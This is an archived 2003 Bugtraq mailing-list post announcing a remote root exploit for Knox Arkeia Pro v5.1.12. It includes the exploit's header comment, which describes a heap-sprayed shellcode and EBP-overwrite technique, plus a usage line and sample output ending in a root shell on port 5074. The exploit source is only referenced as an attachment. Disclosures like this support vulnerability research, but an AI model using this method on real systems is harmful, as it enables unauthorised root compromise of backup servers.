[<prev] [next>] [day] [month] [year] [list]
Message-ID: <20030918230614.46980.qmail@web20503.mail.yahoo.com>
Date: Thu, 18 Sep 2003 16:06:14 -0700 (PDT)
From: "A. C." <bugtraq_vuln@...oo.com>
To: bugtraq@...urityfocus.com
Subject: Knox Arkeia Pro v5.1.12 remote root exploit
Exploit attached for Knox Arkeia Pro v5.1.12 backup
software from http://www.arkeia.com.
/*
* Knox Arkiea arkiead local/remote root exploit.
*
* Portbind 5074 shellcode
*
* Tested on Redhat 8.0, Redhat 7.2, but all versions
are presumed vulnerable.
*
* NULLs out least significant byte of EBP to pull EIP
out of overflow buffer.
* A previous request forces a large allocation of
NOP's + shellcode in heap
* memory. Find additional targets by searching the
heap for NOP's after a
* crash. safeaddr must point to any area of memory
that is read/writable
* and won't mess with program/shellcode flow.
*
* ./ark_sink host targetnum
* [user@...t dir]$ ./ark_sink 192.168.1.2 1
* [*] Connected to 192.168.1.2:617
* [*] Connected to 192.168.1.2:617
* [*] Sending nops+shellcode
* [*] Done, sleeping
* [*] Sending overflow
* [*] Done
* [*] Sleeping and connecting remote shell
* [*] Connected to 192.168.1.2:5074
* [*] Success, enjoy
* id
* uid=0(root) gid=0(root)
groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
*
*
*/
__________________________________
Do you Yahoo!?
Yahoo! SiteBuilder - Free, easy-to-use web site design software
http://sitebuilder.yahoo.com
View attachment "ark_sink.c" of type "text/plain" (5556 bytes)
Powered by blists - more mailing lists